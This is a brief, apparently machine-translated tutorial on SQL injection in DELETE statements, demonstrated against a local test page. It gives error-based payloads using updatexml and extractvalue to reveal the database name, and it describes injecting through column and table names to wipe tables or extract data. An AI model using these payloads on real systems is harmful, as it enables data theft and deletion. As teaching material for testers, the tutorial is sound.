Delete module, access to the home page, http://127.0.0.1/sql/delete.php, to delete the module test.

Delete the grammar:

DELETE FROM [users] WHERE [username] = '1'Copy the code

  

Injection can exist at several locations, but only one is demonstrated here.

The following shows how to inject into different locations.

 

Syntax: String in WHERE clause

Construct the POC:

' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '
Copy the code

Getting the database

Integer in WHERE clause

Construct the POC:

'' or extractvalue(1,concat(0x7e,database())) or ''
Copy the code

Getting the database

Third, the Column Name

The injection point is at [1]

DELETE FROM users WHERE 【1】 = 1 

Way of use:

1. Clear the Users table

Construct error injection statements

 

Four, the Table Name

The injection point is at [1]

DELETE FROM 1 WHERE isadmin = 0 

Way of use:

1. Clear any tables

2, structure error, burst data

The last

Welcome to pay attention to personal wechat public number: Bypass–, once a week original high quality dry goods.